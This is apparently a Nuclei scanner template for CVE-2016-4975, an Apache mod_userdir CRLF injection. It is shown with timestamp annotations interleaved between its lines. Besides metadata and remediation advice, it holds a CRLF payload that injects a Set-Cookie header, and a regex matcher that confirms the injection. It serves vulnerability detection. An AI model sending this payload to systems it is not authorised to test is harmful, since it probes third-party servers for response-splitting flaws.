2021-09-30 19:35:17 +00:00
|
|
|
id: CVE-2016-4975
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Apache mod_userdir CRLF injection
|
2022-02-15 06:09:56 +00:00
|
|
|
author: melbadry9,nadino,xElkomy
|
|
|
|
severity: medium
|
2021-09-30 19:35:17 +00:00
|
|
|
description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and cache poisoning.
|
2023-09-06 13:22:34 +00:00
|
|
|
remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.
|
2022-02-15 06:09:56 +00:00
|
|
|
reference:
|
|
|
|
- https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975
|
|
|
|
- https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975
|
2023-07-11 19:49:27 +00:00
|
|
|
- https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba@%3Ccvs.httpd.apache.org%3E
|
|
|
|
- https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830@%3Ccvs.httpd.apache.org%3E
|
2023-07-15 16:29:17 +00:00
|
|
|
- https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E
|
2021-09-30 19:35:17 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2016-4975
|
|
|
|
cwe-id: CWE-93
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-score: 0.00428
|
2023-12-12 11:07:52 +00:00
|
|
|
epss-percentile: 0.71567
|
2023-09-06 13:22:34 +00:00
|
|
|
cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: apache
|
|
|
|
product: http_server
|
2023-08-18 16:23:19 +00:00
|
|
|
tags: cve,cve2016,crlf,apache
|
2021-09-30 19:35:17 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-09-30 19:35:17 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2021-09-30 19:35:17 +00:00
|
|
|
matchers:
|
|
|
|
- type: regex
|
2022-03-19 09:45:41 +00:00
|
|
|
part: header
|
2021-09-30 19:35:17 +00:00
|
|
|
regex:
|
|
|
|
- '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
|
2023-12-29 09:30:44 +00:00
|
|
|
# digest: 490a0046304402201e3d7b1750ea0331f37c87bdb7116e1196954a17c7399a700bf4282b0096b8e102200ffa21c484c0c36e220ad3c635a98bf45206dc33745bcfc70b6d117ccf0d0410:922c64590222798bb761d5b6d8e72950
|